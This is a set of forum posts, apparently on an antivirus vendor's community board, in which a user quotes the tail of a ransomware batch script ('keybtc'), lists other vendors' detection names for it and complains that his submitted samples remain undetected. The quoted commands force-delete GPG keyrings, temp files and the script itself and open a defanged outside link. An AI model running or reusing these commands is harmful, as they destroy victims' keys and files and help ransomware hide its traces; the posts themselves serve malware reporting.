*There are some more commands like this. It seems that this script sends spams also...
And finally... delete a lot of files and link
C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Roaming\gnupg\*.*"C:\Users\%UserName%\AppData\Roaming>rmdir /s /q "C:\Users\%UserName%\AppData\Roaming\gnupg"C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\sdelete.exe"C:\Users\%UserName%\AppData\Roaming>start hxxp://bit.ly/keybtcC:\Users\%UserName%\AppData\Roaming>cd "C:\Users\%UserName%\AppData\Local\Temp"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.bak"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\ltr*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\trustdb.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\random_seed"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\crypta.bin"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.lock"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.btc"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q keybtc.cmd
Remark: start hxxp://bit.ly/keybtc - hxxp://en.wikipedia.org/wiki/RSA_(cryptosystem)#Key_generation Why it opens this Wikipedia page?
information above @Malwarehunter (malwaretips.com)
Can you explain why after 3 days i sent file
keybtc.btc are still undetected?
AVG Generic11_c.QPE 20140808
Avast Other:Malware-gen [Trj] 20140807
DrWeb BAT.Encoder.23 20140808
Emsisoft Trojan-Ransom.BAT.Agent (A) 20140808
GData Script.Trojan-Ransom.Scatter.A 20140808
Kaspersky Trojan-Ransom.BAT.Scatter.s 20140808
Microsoft Ransom:BAT/Xibow.A 20140808
Symantec Trojan Horse 20140808
Tencent Bat.Trojan.Scatter.Lnes 20140808
ESET=??????
All file sent to you i give you source link to download
When ESET Malware Response Team add detection?
Why ESET Malware Response Team don't block dowload of *.btc files and only block *.zip file from collapseit.com?
Why from 3 days ESET Malware Response Team haven't answer to my mail?
Thanks
-
I have sent mail with attach files and screenshot
I have the last 144 files triple check with emisoft, kaspersky, bitdefender (only troyan and backdoor no corrupt files and not detect by eset smart securty 7)
Can you please tell me if i can send a mail with screenshot and link to download? or do you prefer 10 20 samples in attach for time?
Thank You
Regards
Luigi
-
I have do how you have suggested
remove clean, corrupted, puas, grayware etc
no more large packages
i have send a small packages with 14 files (test with other software vendors infected)
Regards
Luigi
-
Hy
I write here to ask :
I have send mail to samples@eset.com to ask how submit a large collection of malware
ESET Malware Response Team answer me to send samples to check the quality.
I sent it but i not receive answer
I have send mail to samples@eset.com with some malware samples but no attach because too large and i post a link with request to alert me if don't accept it
i not receive answer
I have Eset Smart Security 7 with 5 licenses
I wrote to support@eset.com but they tell me to write a samples@eset.com
How i can have a feedback and answer?
Thank You
Regards
Luigi
Vbs/troyandownloader.agent.nkm Troyan Horse
in Malware Finding and Cleaning
Posted
update
now Eset block all download files from collapseit.com (GOOD WORK ESET)
keybtc.btc are still undetected